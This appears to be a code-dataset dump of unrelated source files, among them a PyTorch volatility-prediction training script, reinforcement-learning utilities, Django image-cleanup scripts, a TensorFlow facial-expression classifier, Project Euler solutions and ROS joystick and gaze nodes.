input_0.append(each_stock_train_data[time_id]['input_'])
target_0.append([each_stock_train_data[time_id]['target_']])
input_1 = torch.tensor(input_0, dtype=torch.float32, requires_grad=True).to(device)
target_ = torch.tensor(target_0, dtype=torch.float32).to(device)
conv_out, rnn_out, output_2 = lstmmodel(input_1)
loss_0 = criterion(conv_out, target_)
loss_1 = criterion(rnn_out, target_)
loss_2 = RMSPELoss(output_2, target_)
loss_ = torch.mul(0.1, loss_0) + torch.mul(0.1, loss_1) + loss_2
optimizer_2.zero_grad()
loss_.backward(retain_graph=True)
optimizer_2.step()
output_each_stock.append(output_2.cpu().detach().numpy().ravel())
target_each_stock.append(np.array(target_0).ravel())
loss_0_each_stock.append(loss_0.item())
loss_1_each_stock.append(loss_1.item())
loss_2_each_stock.append(loss_2.item())
loss_each_stock.append(loss_.item())
mean_loss_0 = np.mean(loss_0_each_stock)
mean_loss_1 = np.mean(loss_1_each_stock)
mean_loss_2 = np.mean(loss_2_each_stock)
mean_loss = np.mean(loss_each_stock)
logging.debug(f'epoch = {epoch} , stock_id = {stock_id} , loss_each_stock : {mean_loss}')
rmspe_ = rmspe(np.array(output_each_stock), np.array(target_each_stock))
logging.debug(
f'epoch = {epoch} , stock_id = {stock_id} , rmspe each stock : {rmspe_}')
# loss_all.append(np.mean(loss_each_stock))
writer.add_scalar('V2-LOSS_0', mean_loss_0, writer.count)
writer.add_scalar('V2-LOSS_1', mean_loss_1, writer.count)
writer.add_scalar('V2-LOSS_2', mean_loss_2, writer.count)
writer.add_scalar('V2-LOSS', mean_loss, writer.count)
writer.add_scalar('V2-rmspe', rmspe_, writer.count)
writer.count += 1
torch.save(lstmmodel.state_dict(), 'train_out/model_weights_' + str(epoch) + '.pth')
# 每一个epoch之后就测试一下验证集
# with torch.no_grad():
# test()
# idx = np.arange(np_train.shape[0])
# train_idx, valid_idx = train_test_split(idx, shuffle=True, test_size=0.1, random_state=SEED)
def start_train():
for epoch in range(1, EPOCH_ACCOUNT):
train_bach(epoch)
def predict():
full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)}
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
# lstmmodel.zero_grad()
loss_all = []
# pool = Pool(30) # 创建进程池,最大进程数为 NTHREADS
target = []
for index, row in test_ds.iterrows():
# print(row['stock_id'])
stock_id = row['stock_id']
trade_test_id = book_train_dict.get(stock_id)
trade_test_ = pd.read_parquet(trade_test_id)
optiver_ds = pd.read_parquet(book_test_dict.get(stock_id))
time_id = row['time_id']
ARGS = dict(optiver_ds=optiver_ds, full_seconds_in_bucket=full_seconds_in_bucket, trade_test_=trade_test_,
stock_id=stock_id)
input_0 = process_test_bach(time_id, ARGS)
if input_0 is None:
target.append(0)
continue
input_0 = input_0[None, :, :]
input_1 = torch.tensor(input_0, dtype=torch.float32, requires_grad=True).to(device)
with torch.no_grad():
output_2, _ = lstmmodel(input_1)
target.append(output_2.item())
test_ds['target'] = target
# print(test_ds)
test_ds[['row_id', 'target']].to_csv('submission.csv', index=False)
if __name__ == '__main__':
logging.debug('-------- start -----------')
# print("CPU的核数为:{}".format(cpu_count()))
NTHREADS = cpu_count()
SEED = 42
TRAIN_BATCH_SIZE = 3
TEST_BATCH_SIZE = 256
EPOCH_ACCOUNT = 250
# DATA_PATH = '../input/optiver-realized-volatility-prediction'
DATA_PATH = '/home/data/optiver-realized-volatility-prediction/'
# DATA_PATH = '/home/szu/liyu/data/optiver-realized-volatility-prediction/'
BOOK_TRAIN_PATH = DATA_PATH + 'book_train.parquet'
TRADE_TRAIN_PATH = DATA_PATH + 'trade_train.parquet'
BOOK_TEST_PATH = DATA_PATH + 'book_test.parquet'
TRADE_TEST_PATH = DATA_PATH + 'trade_test.parquet'
train_ds = pd.read_csv(os.path.join(DATA_PATH, 'train.csv'))
test_ds = pd.read_csv(os.path.join(DATA_PATH, 'test.csv'))
print(f'Train ds shape: {train_ds.shape}')
print(f'Test ds shape: {test_ds.shape}')
train_ds['row_id'] = train_ds['stock_id'].astype(str) + '-' + train_ds['time_id'].astype(str)
book_train_dict = get_path_dict(BOOK_TRAIN_PATH, train_ds['stock_id'].unique())
trade_train_dict = get_path_dict(TRADE_TRAIN_PATH, train_ds['stock_id'].unique())
book_test_dict = get_path_dict(BOOK_TEST_PATH, test_ds['stock_id'].unique())
trade_test_dict = get_path_dict(TRADE_TEST_PATH, test_ds['stock_id'].unique())
book_skip_columns = trade_skip_columns = ['time_id', 'row_id', 'target']
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
print(device)
input_features_num = 11
lstmmodel = LSTMModel(
ntoken=input_features_num * 8,
ninp=input_features_num * 10,
nhid=input_features_num * 10,
nlayers=5,
).to(device)
# lstmmodel.load_state_dict(torch.load('train_out/model_weights_2.pth'))
# lstmmodel.eval()
print(lstmmodel)
criterion = nn.MSELoss()
optimizer_2 = optim.Adam(lstmmodel.parameters(), lr=0.00001)
writer = SummaryWriter()
writer.count = 1
# predict()
start_train()
``` |
{
"source": "757670303037/stable-baselines",
"score": 2
} |
#### File: stable_baselines/trpo_mpi/utils.py
```python
import numpy as np
def add_vtarg_and_adv(seg, gamma, lam):
"""
Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)
:param seg: (dict) the current segment of the trajectory (see traj_segment_generator return for more information)
:param gamma: (float) Discount factor
:param lam: (float) GAE factor
"""
# last element is only used for last vtarg, but we already zeroed it if last new = 1
episode_starts = np.append(seg["episode_starts"], False)
vpred = np.append(seg["vpred"], seg["nextvpred"])
rew_len = len(seg["rewards"])
seg["adv"] = np.empty(rew_len, 'float32')
rewards = seg["rewards"]
lastgaelam = 0
for step in reversed(range(rew_len)):
nonterminal = 1 - float(episode_starts[step + 1])
delta = rewards[step] + gamma * vpred[step + 1] * nonterminal - vpred[step]
seg["adv"][step] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam
seg["tdlamret"] = seg["adv"] + seg["vpred"]
``` |
{
"source": "75RAUL/georef",
"score": 2
} |
#### File: georef/scripts/cleanupImagedata.py
```python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import *
from geocamUtil import imageInfo
from geocamUtil.ErrorJSONResponse import ErrorJSONResponse, checkIfErrorJSONResponse
from geocamTiePoint.viewHelpers import *
from django.conf import settings
import sys
print sys.argv
"""
//0. add a sizeType field to imageData model and migrate
1. compile a list of all used imageData
for each overlay -> overlay.imageData and overlay.getRawImageData (make sure no dupes)
2. compile a list of all used quadtrees
for each overlay-> overlay.unalignedQtree / alignedQtree.
for each used imageData, search for corresponding quad tree QuadTree(imageData__key = self.key)
make sure there are no dupes
3. loop through image imageData,
make sure it's in the used ImageData list, if not, delete (DO THIS ON A COPY: AND delete its image / unenhancedImage/ enhancedImage!!!)
4. loop through quad trees, if it's not in a used quad tree list, delete.
"""
def listUsedImageData():
imageDataList = []
overlays = Overlay.objects.all()
for overlay in overlays:
try:
imageDataList.append(overlay.imageData.id)
except:
print "overlay %s has no image data" % overlay.name
try:
imageDataList.append(overlay.getRawImageData().id)
except:
print "overlay %s has no raw image!" % overlay.name
return list(set(imageDataList))
def listUsedQuadTrees():
qtreeList = []
overlays = Overlay.objects.all()
imdList = listUsedImageData()
for overlay in overlays:
try:
qtreeList.append(overlay.unalignedQuadTree.id)
except:
pass
try:
qtreeList.append(overlay.alignedQuadTree.id)
except:
pass
for imd in imdList:
try:
qtreeList.append(Quadtree.objects.get(imageData = imd).id)
except:
pass
return list(set(qtreeList))
def listUsedImages():
goodImages = []
goodImageData = listUsedImageData()
for imdata_id in goodImageData:
imageData = ImageData.objects.get(id=imdata_id)
try:
goodImages.append(imageData.image.name.split('/')[-1])
except:
pass
try:
goodImages.append(imageData.unenhancedImage.name.split('/')[-1])
except:
pass
try:
goodImages.append(imageData.unenhancedImage.name.split('/')[-1])
except:
pass
return list(set(goodImages))
"""
Main functions
"""
def cleanupImageData():
goodImageData = listUsedImageData()
allImdata = ImageData.objects.all()
for imdata in allImdata:
print "image data %d" % imdata.id
if imdata.id not in goodImageData:
print "%d deleted" % imdata.id
imdata.delete()
def cleanupQuadTrees():
goodQtrees = listUsedQuadTrees()
allQtrees = QuadTree.objects.all()
for qtree in allQtrees:
print "qtree %d" % qtree.id
if qtree.id not in goodQtrees:
print "%d deleted" % qtree.id
qtree.delete()
def cleanupImageFiles():
# get all the image file names stored in good image data.
#goodImageData = listUsedImageData()
#list all files in the data directory
from os import listdir
from os.path import isfile, join
goodImages = listUsedImages()
print "good images are"
print goodImages
mypath = '/home/geocam/georef/data/geocamTiePoint/overlay_images'
# mypath = '/home/vagrant/gds/georef/data/geocamTiePoint/overlay_images'
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
for file in onlyfiles:
print "file name %s" % file
if file not in goodImages:
print "%s deleted" % file
os.remove(mypath + '/' + file)
def createRawImageData():
overlays = Overlay.objects.all()
for overlay in overlays:
try:
mission, roll, frame = overlay.name.split('.')[0].split('-')
except:
continue
raw = overlay.getRawImageData()
if not raw:
print "no raw imagedata exists for overlay %d" % overlay.pk
oldImageData = None
oldImageData = overlay.imageData
if oldImageData is None:
print "Error: overlay %d has no image data!" % overlay.pk
continue
sizeType = None
sizeType= None
try:
if oldImageData.image.size < 600000:
sizeType = 'small'
else:
sizeType = 'large'
except:
continue
issImage = ISSimage(mission, roll, frame, sizeType)
imageUrl = issImage.imageUrl
# get image data from url
imageFile = imageInfo.getImageFile(imageUrl)
if checkIfErrorJSONResponse(imageFile):
continue
rawImageData = createImageData(imageFile, True)
print "new raw imagedata %d saved for overlay %d" % (rawImageData.id, overlay.pk)
rawImageData.overlay = overlay
rawImageData.save()
def __main__():
arg1 = sys.argv[1]
if arg1 == '1':
cleanupImageData()
elif arg1 == '2':
cleanupQuadTrees()
elif arg1 == '3':
cleanupImageFiles()
elif arg1 == '4':
createRawImageData()
else:
print "Wrong argument. Either needs to be 1 2 or 3"
pass # do nothing
__main__()
# def buildQuadTreeImageDictionary():
# """
# Builds a dict that maps a used (by overlay) quadtree id to issMRF
# """
# dict = {} # key is quad tree id, value is issMRF
# overlays = Overlay.objects.all()
# for overlay in overlays:
# dict[overlay.unalignedQuadTree.id] = overlay.imageData.issMRF
# dict[overlay.alignedQuadTree.id] = overlay.imageData.issMRF
#
# return dict
#
# def cleanupQuadTrees():
# """
# Deletes unused quad tree objects
# """
# dict = buildQuadTreeImageDictionary()
# qtrees = QuadTree.objects.all()
# for tree in qtrees:
# if tree.id not in dict.keys():
# tree.delete()
#
#
# def cleanupImageData():
# overlays = Overlay.objects.all()
# for overlay in overlays:
# overlay.getRawImageData()
#
# def generateImageData():
# for overlay in overlays:
# issID = overlay.name.split('.')[0].split('-')
# mission = issID[0]
# roll = issID[1]
# frame = issID[2]
# issImage = ISSimage(mission, roll, frame, sizeType)
# imageUrl = issImage.imageUrl
# imageFile = imageInfo.getImageFile(imageUrl)
```
#### File: georef/scripts/moveCenterPtOutOfExtras.py
```python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
overlays = Overlay.objects.all()
for overlay in overlays:
overlay.centerLat = overlay.extras.centerLat
overlay.centerLon = overlay.extras.centerLon
overlay.nadirLat = overlay.extras.nadirLat
overlay.nadirLon = overlay.extras.nadirLon
overlay.save()
moveCenterPtOutOfExtras()
``` |
{
"source": "75team/SublimeJS",
"score": 2
} |
#### File: SublimeJS/core/http.py
```python
import urllib.request
import urllib.parse
import threading
import sublime
from PyV8 import JSObject, JSArray, JSFunction
from SublimeJS.v8 import getContext, convert
class Http:
def request(self, options, callback=None):
def _call(host, port, auth, method, path, data='', headers={}, callback=None, *args):
data = urllib.parse.urlencode(data)
if(auth):
host = auth + '@' + host
url = 'http://' + host + ':' + str(port) + path;
res = None
try:
if(method == 'GET' and data != ''):
url = url + '?' + data
req = urllib.request.Request(url);
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
if(method != 'GET'):
res = opener.open(req, data)
else:
res = opener.open(req)
except Exception as ex:
pass
if(callback):
def _callback():
ctx = getContext()
ctx._js_ctx.enter()
callback(res)
ctx._js_ctx.leave()
sublime.set_timeout(_callback, 0)
options = convert(options)
host = ('hostname' in options and options['hostname']) or ('host' in options and options['host']) or 'localhost'
port = ('port' in options and options['port']) or 80
method = ('method' in options and options['method']) or 'GET'
path = ('path' in options and options['path']) or '/'
data = ('data' in options and options['data']) or ''
headers = ('headers' in options and convert(options['headers'])) or {'host': host}
auth = ('auth' in options and options['auth']) or ''
#_call(host, port, method, path, data, headers, callback)
thread = threading.Thread(target=_call, args=(host, port, auth, method, path, data, headers, callback))
thread.start()
def get(self, options, callback=None):
if(type(options) == str):
r = urllib.parse.urlparse(options)
options = {'hostname': r.hostname, 'port': r.port, 'path': r.path, 'method':'GET'}
if(r.username):
options.auth = r.username
if(r.password):
options.auth = options.auth + ':' + r.password
self.request(options, callback)
def exports():
return Http()
``` |
{
"source": "760146355/Pointnet_Pointnet2_pytorch",
"score": 2
} |
#### File: Pointnet_Pointnet2_pytorch/data_utils/S3DISDataLoader.py
```python
import os
from torch.utils.data import Dataset
import numpy as np
import h5py
classes = ['ceiling','floor','wall','beam','column','window','door','table','chair','sofa','bookcase','board','clutter']
class2label = {cls: i for i,cls in enumerate(classes)}
def getDataFiles(list_filename):
return [line.rstrip() for line in open(list_filename)]
def load_h5(h5_filename):
f = h5py.File(h5_filename)
data = f['data'][:]
label = f['label'][:]
return (data, label)
def loadDataFile(filename):
return load_h5(filename)
def recognize_all_data(test_area = 5):
ALL_FILES = getDataFiles('./data/indoor3d_sem_seg_hdf5_data/all_files.txt')
room_filelist = [line.rstrip() for line in open('./data/indoor3d_sem_seg_hdf5_data/room_filelist.txt')]
data_batch_list = []
label_batch_list = []
for h5_filename in ALL_FILES:
data_batch, label_batch = loadDataFile('./data/' + h5_filename)
data_batch_list.append(data_batch)
label_batch_list.append(label_batch)
data_batches = np.concatenate(data_batch_list, 0)
label_batches = np.concatenate(label_batch_list, 0)
test_area = 'Area_' + str(test_area)
train_idxs = []
test_idxs = []
for i, room_name in enumerate(room_filelist):
if test_area in room_name:
test_idxs.append(i)
else:
train_idxs.append(i)
train_data = data_batches[train_idxs, ...]
train_label = label_batches[train_idxs]
test_data = data_batches[test_idxs, ...]
test_label = label_batches[test_idxs]
print('train_data',train_data.shape,'train_label' ,train_label.shape)
print('test_data',test_data.shape,'test_label', test_label.shape)
return train_data,train_label,test_data,test_label
class S3DISDataLoader(Dataset):
def __init__(self, data, labels):
self.data = data
self.labels = labels
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.data[index], self.labels[index]
``` |
{
"source": "7636kei/PE-logbook",
"score": 3
} |
#### File: 7636kei/PE-logbook/PE00a.py
```python
import math
def checkprime(k):
prime_flag = True
for i in range(2, 1 + math.ceil(math.sqrt(k))):
if k % i == 0:
prime_flag = False
break
return prime_flag
def sumofprimes(targ_num):
#find the sum of all primes up to, and excluding, 'targ_num'
runsum = 0
if targ_num < 2:
runsum = 0 #no primes under 2, remember? 🤣
elif targ_num < 3:
runsum = 2 #nailed 2
elif targ_num < 5:
runsum = 2 + 3 #nailed 3 too
else:
runsum = 2 + 3
seed = 0 #for any prime p > 3, p % 6 = ±1
while seed < math.floor(targ_num/6):
seed = seed + 1
if(checkprime(6*seed - 1) == True):
runsum = runsum + 6*seed -1
if(checkprime(6*seed + 1) == True and targ_num > 6*seed + 1):
runsum = runsum + 6*seed + 1
return runsum
print(sumofprimes(2000000))
``` |
{
"source": "764994703/HCI-project",
"score": 2
} |
#### File: HCI-project/integrated system/PlayMp3.py
```python
import pyttsx3
import pygame
import random
import time
import os
import win32com
class PlayMp3:
def __init__(self):
pygame.mixer.init()
pygame.init()
def play(self, path):
if(pygame.mixer.music.get_busy()):
return
nextSound = pygame.mixer.Sound(path)
pygame.mixer.Channel(0).queue(nextSound)
# print(pygame.mixer.Channel(0).get_queue())
return
def emergentplay(self, path):
if(pygame.mixer.music.get_busy()):
return
pygame.mixer.Channel(0).stop()
pygame.mixer.music.load(path)
pygame.mixer.music.play()
def test():
x = PlayMp3()
x.noeyes()
x.noface()
x.tired()
if __name__ == "__main__":
test()
```
#### File: HCI-project/tensorflow/FER.py
```python
import tensorflow as tf
import pandas as pd
import numpy as np
import random
from PIL import Image
IMAGE_SIZE = 48
CLIPED_SIZE = 42
EMO_NUM = 7
TRAIN_SIZE = 4 * (35887 * 2 - 10000)
VALID_SIZE = 1500
TEST_SIZE = 5000
BATCH_SIZE = 50
NUM_CHANNEL = 1
EPOCHS = 50
SAVE_PATH = './saved_model'
emo_dict = {
0: 'Angry', 1: 'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Sad', 5: 'Suprise', 6: 'Neutral'
}
def GetSymmetric(pixel, size):
'''
pixel: np array with shape (count,size,size,1)
'''
count = pixel.shape[0]
sym = np.zeros((count, size, size, NUM_CHANNEL))
for i in range(count):
for j in range(size):
for k in range(size):
sym[i, j, k, 0] = pixel[i, j, size - k - 1, 0]
return sym
def GetClipedImage(pixel, start):
'''
pixel: raw 48*48 pixel data with shape (count, 48, 48, 1)
start: a tuple such as (0,0),(2,3),(4,2), represents start point of clipped 42*42 image
'''
count = pixel.shape[0]
out = np.zeros((count, CLIPED_SIZE, CLIPED_SIZE, NUM_CHANNEL))
for i in range(count):
for j in range(CLIPED_SIZE):
out[i, j, :, 0] = pixel[i, start[0] + j, start[1]:start[1] + CLIPED_SIZE, 0]
return out
def GetInput():
all_data = pd.read_csv('fer2013.csv')
label = np.array(all_data['emotion'])
data = np.array(all_data['pixels'])
sample_count = len(label) # should be 35887
pixel_data = np.zeros((sample_count, IMAGE_SIZE * IMAGE_SIZE)) # 像素点数据
label_data = np.zeros((sample_count, EMO_NUM), dtype=int) # 标签数据,独热
for i in range(sample_count):
x = np.fromstring(data[i], sep=' ')
max = x.max()
x = x / (max + 0.001) # 灰度归一化
pixel_data[i] = x
label_data[i, label[i]] = 1
pixel_data = pixel_data.reshape(sample_count, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL)
x_test = pixel_data[30000:35000]
y_test = label_data[30000:35000]
x_train = np.concatenate((pixel_data[0:30000], pixel_data[35000:]), axis=0)
symmetric_x_train = GetSymmetric(x_train, IMAGE_SIZE)
x_train = np.concatenate((x_train, symmetric_x_train), axis=0)
y_train = np.concatenate((label_data[0:30000], label_data[35000:], label_data[0:30000], label_data[35000:]))
return (x_train, y_train, x_test, y_test)
def DataPreprocess(pixel, label=[]):
'''
pixel: pixel data with shape (count,48,48,1)
label: optical, corresponding label of pixel
'''
a = random.randint(0, 2)
b = random.randint(3, 5)
c = random.randint(0, 2)
d = random.randint(3, 5)
pixel1 = GetClipedImage(pixel, (a, c))
pixel2 = GetClipedImage(pixel, (a, d))
pixel3 = GetClipedImage(pixel, (b, c))
pixel4 = GetClipedImage(pixel, (b, d))
out_p = np.concatenate((pixel1, pixel2, pixel3, pixel4), axis=0)
if len(label) == 0:
return out_p
else:
out_l = np.concatenate((label, label, label, label), axis=0)
return (out_p, out_l)
def model(data, keep_prob):
# first layer IN: 42*42*1 OUT: 20*20*32
kernel1 = tf.Variable(tf.truncated_normal([5, 5, NUM_CHANNEL, 32], stddev=5e-2))
conv1 = tf.nn.conv2d(data, kernel1, [1, 1, 1, 1], padding='SAME')
bias1 = tf.Variable(tf.zeros([32]))
relu1 = tf.nn.relu(tf.nn.bias_add(conv1, bias1))
pool1 = tf.nn.max_pool(relu1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID')
# second layer IN: 20*20*32 OUT: 10*10*32
kernel2 = tf.Variable(tf.truncated_normal([4, 4, 32, 32], stddev=5e-2))
conv2 = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding='SAME')
bias2 = tf.Variable(tf.zeros([32]))
relu2 = tf.nn.relu(tf.nn.bias_add(conv2, bias2))
pool2 = tf.nn.max_pool(relu2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
# third layer IN: 10*10*32 OUT: 5*5*64
kernel3 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=5e-2))
conv3 = tf.nn.conv2d(pool2, kernel3, [1, 1, 1, 1], padding='SAME')
bias3 = tf.Variable(tf.zeros([64]))
relu3 = tf.nn.relu(tf.nn.bias_add(conv3, bias3))
pool3 = tf.nn.max_pool(relu3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
# fully connected layers
fc1_data = tf.reshape(pool3, shape=[-1, 5 * 5 * 64])
fc1 = tf.contrib.layers.fully_connected(fc1_data, 1024, activation_fn=tf.nn.relu)
fc1_out = tf.nn.dropout(fc1, keep_prob)
fc2 = tf.contrib.layers.fully_connected(fc1_out, 512, activation_fn=tf.nn.relu)
fc2_out = tf.nn.dropout(fc2, keep_prob)
logits = tf.contrib.layers.fully_connected(fc2_out, 7, activation_fn=None)
logits = tf.identity(logits, name='LOGITS')
return logits
def train(x_train, y_train, x_val, y_val):
x_data = tf.placeholder(tf.float32, shape=(None, CLIPED_SIZE, CLIPED_SIZE, NUM_CHANNEL), name='INPUT')
y_data = tf.placeholder(tf.int16, shape=(None, EMO_NUM), name='LABEL')
keep_prob = tf.placeholder(tf.float32, name='KEEP')
y_pred = model(x_data, keep_prob)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=y_pred, labels=y_data))
global_step = tf.Variable(0)
learning_rate = tf.train.exponential_decay(0.1, global_step, 300, 0.99, staircase=True)
# optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost, global_step=global_step)
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost, global_step=global_step)
correct_pred = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_data, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name='ACCURACY')
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
step = 0
for epoch in range(EPOCHS):
for batch_i in range(TRAIN_SIZE // BATCH_SIZE):
step += 1
x_feats = x_train[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
y_feats = y_train[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
feed = {x_data: x_feats, y_data: y_feats, keep_prob: 0.6}
sess.run(optimizer, feed_dict=feed)
if step % 128 == 0:
(loss, acc) = sess.run([cost, accuracy], feed_dict=feed)
feed_v = {x_data: x_val, y_data: y_val, keep_prob: 1.0}
acc_v = sess.run(accuracy, feed_dict=feed_v)
print("In epoch %d, batch %d, loss: %.3f, accuracy: %.3f, validation accuracy: %.3f" % (
epoch, batch_i, loss, acc, acc_v))
saver = tf.train.Saver()
saver_path = saver.save(sess, SAVE_PATH)
print('Finished!')
def test(x_test, y_test):
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph) as sess:
# load the model
loader = tf.train.import_meta_graph(SAVE_PATH + '.meta')
loader.restore(sess, SAVE_PATH)
load_x = loaded_graph.get_tensor_by_name('INPUT:0')
load_y = loaded_graph.get_tensor_by_name('LABEL:0')
load_acc = loaded_graph.get_tensor_by_name('ACCURACY:0')
load_log = loaded_graph.get_tensor_by_name('LOGITS:0')
load_keep = loaded_graph.get_tensor_by_name('KEEP:0')
# record accuracy
total_batch_acc = 0
batch_count = TEST_SIZE // BATCH_SIZE
(x_test, y_test) = DataPreprocess(x_test, y_test)
for batch_i in range(batch_count):
log = np.zeros((BATCH_SIZE, EMO_NUM))
y_feats = y_test[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
for k in range(4):
x_feats = x_test[batch_i * BATCH_SIZE + k * TEST_SIZE: (batch_i + 1) * BATCH_SIZE + k * TEST_SIZE]
log1 = sess.run(load_log, feed_dict={
load_x: x_feats, load_y: y_feats, load_keep: 1.0
})
x_feats = GetSymmetric(x_feats, CLIPED_SIZE)
log2 = sess.run(load_log, feed_dict={
load_x: x_feats, load_y: y_feats, load_keep: 1.0
})
log += log1 + log2
emos = sess.run(tf.argmax(log, 1))
correct_emos = sess.run(tf.argmax(y_feats, 1))
tmp = emos == correct_emos
acc = tmp.sum() / tmp.shape[0]
total_batch_acc += acc
print('In test batch %d: the accuracy is %.3f' % (batch_i, acc))
print('Total accuracy in test set is %.3f' % (total_batch_acc / batch_count))
def classify(files):
'''
files: 需要识别的图片路径列表,放在同目录下的相对路径即可,如['im1.jpg','im2.jpg']
提取像素用的Pillow库的Image模块
'''
file_count = len(files)
pixel = np.zeros((file_count, IMAGE_SIZE * IMAGE_SIZE))
for file_index in range(file_count):
im = Image.open(files[file_index]).convert('L')
im = im.resize((IMAGE_SIZE, IMAGE_SIZE))
for i in range(IMAGE_SIZE * IMAGE_SIZE):
pixel[file_index, i] = im.getpixel((i // IMAGE_SIZE, i % IMAGE_SIZE))
pixel[file_index] = pixel[file_index] / (pixel[file_index].max() + 0.001)
pixel = pixel.reshape(file_count, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL)
pixel = DataPreprocess(pixel)
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph) as sess:
loader = tf.train.import_meta_graph(SAVE_PATH + '.meta')
loader.restore(sess, SAVE_PATH)
load_x = loaded_graph.get_tensor_by_name('INPUT:0')
load_y = loaded_graph.get_tensor_by_name('LABEL:0')
load_log = loaded_graph.get_tensor_by_name('LOGITS:0')
load_keep = loaded_graph.get_tensor_by_name('KEEP:0')
logit = sess.run(load_log, feed_dict={
load_x: pixel, load_y: np.zeros((file_count * 4, EMO_NUM)), load_keep: 1.0
})
log = np.zeros((file_count, EMO_NUM))
for i in range(4):
log += logit[i * file_count:(i + 1) * file_count]
emos = sess.run(tf.argmax(log, 1))
for emo in emos:
print(emo_dict[emo])
if __name__ == '__main__':
(x_train, y_train, x_test, y_test) = GetInput()
print(x_train.shape)
(x_train, y_train) = DataPreprocess(x_train, y_train)
print(x_train.shape)
print('Start!')
x_val = x_test[0:500]
y_val = y_test[0:500]
(x_val, y_val) = DataPreprocess(x_val, y_val)
train(x_train, y_train, x_val, y_val)
print(x_test.shape)
test(x_test, y_test)
``` |
{
"source": "766F6964/Euler-Problems",
"score": 4
} |
#### File: Euler-Problems/Python/Problem002.py
```python
def fibonacci_sequence():
a, b, sum = 0, 1, 0
while a < 4000000:
if a % 2 == 0:
sum += a
a, b = b, a + b
return sum
print(fibonacci_sequence())
```
#### File: Euler-Problems/Python/Problem004.py
```python
def largest_palindrome():
for x in range(0, 1000):
for k in range(0, 1000):
if(str(x*k) == str(x*k)[::-1]):
yield x*k
print(max(largest_palindrome()))
```
#### File: Euler-Problems/Python/Problem005.py
```python
def greatest_common_divisor(a, b):
return b and greatest_common_divisor(b, a % b) or a
def least_common_multiple(a, b):
return a * b / greatest_common_divisor(a,b)
def smallest_multiple(k):
n = 1
for i in range(1, k + 1):
n = least_common_multiple(n, i)
return int(n)
print(smallest_multiple(20))
```
#### File: Euler-Problems/Python/Problem015.py
```python
def count_lattice_paths(size):
x = [1] * size
for k in range(0, size):
for n in range(0, k):
x[n] = x[n] + x[n - 1]
x[k] = 2 * x[k - 1]
return x[size - 1]
print(count_lattice_paths(20))
```
#### File: Euler-Problems/Python/Problem021.py
```python
def get_divisors(n):
sum = 1
for i in range(2, int(n ** 0.5 + 1)):
if n % i == 0:
sum += i
sum += n / i
return sum
def find_amicable_pair():
total = 0
for x in range(1, 10001):
a = get_divisors(x)
b = get_divisors(a)
if b == x and x != a:
total += x
return total
print(find_amicable_pair())
``` |
{
"source": "7675t/jog_twist",
"score": 3
} |
#### File: jog_twist/script/joy_to_twist.py
```python
import rospy
from geometry_msgs.msg import TwistStamped
from sensor_msgs.msg import Joy
class joy_to_twist:
def __init__(self):
self.pub = rospy.Publisher('cmd_vel', TwistStamped, queue_size=1)
# Convert to TwistStamped and republish
def callback(self, joy):
ts = TwistStamped()
ts.header.stamp = rospy.Time.now()
# These buttons are binary
ts.twist.linear.x = -joy.buttons[4] + joy.buttons[5]
# Double buttons
ts.twist.linear.y = joy.axes[0]
ts.twist.linear.z = joy.axes[1]
ts.twist.angular.x = -joy.axes[3]
ts.twist.angular.y = joy.axes[4]
# These buttons are binary
ts.twist.angular.z = -joy.buttons[0] + joy.buttons[1]
self.pub.publish(ts)
def republish(self):
rospy.Subscriber("joy", Joy, self.callback)
rospy.spin()
if __name__ == '__main__':
rospy.init_node('joy_to_twist', anonymous=True)
republisher = joy_to_twist()
republisher.republish()
``` |
{
"source": "7675t/nextage_recognition",
"score": 2
} |
#### File: nextage_recognition/script/gaze_plane_projector.py
```python
import rospy
import tf
from tf import TransformListener
from geometry_msgs.msg import PointStamped, Vector3Stamped
# input geometry_msgs/Vector3Stamped
# 平面はframe_idをパラメータで与え、その座標系のxy平面とする
# output geometry_msgs/PointStamped
# rotate vector v1 by quaternion q1
def qv_mult(q1, v1):
v1 = tf.transformations.unit_vector(v1)
q2 = list(v1)
q2.append(0.0)
return tf.transformations.quaternion_multiply(
tf.transformations.quaternion_multiply(q1, q2),
tf.transformations.quaternion_conjugate(q1)
)[:3]
class VectorPlaneProjector:
def __init__(self):
self.nh = rospy.init_node('vector_plane_projector')
self.tf = TransformListener()
self.plane_frame_id = rospy.get_param('~plane_frame_id', 'map')
rospy.Subscriber("gaze_vector", Vector3Stamped, self.vector_cb)
self.pub_ = rospy.Publisher('~point', PointStamped, queue_size=1)
def vector_cb(self, vector_msg):
vector_frame_id = vector_msg.header.frame_id
self.tf.waitForTransform(
self.plane_frame_id, vector_frame_id, rospy.Time(0), rospy.Duration(1.0))
vector = self.tf.transformVector3(self.plane_frame_id, vector_msg)
position, quaternion = self.tf.lookupTransform(self.plane_frame_id, vector_frame_id, rospy.Time(0))
# calculate projected point
# a x + b y + c z = d
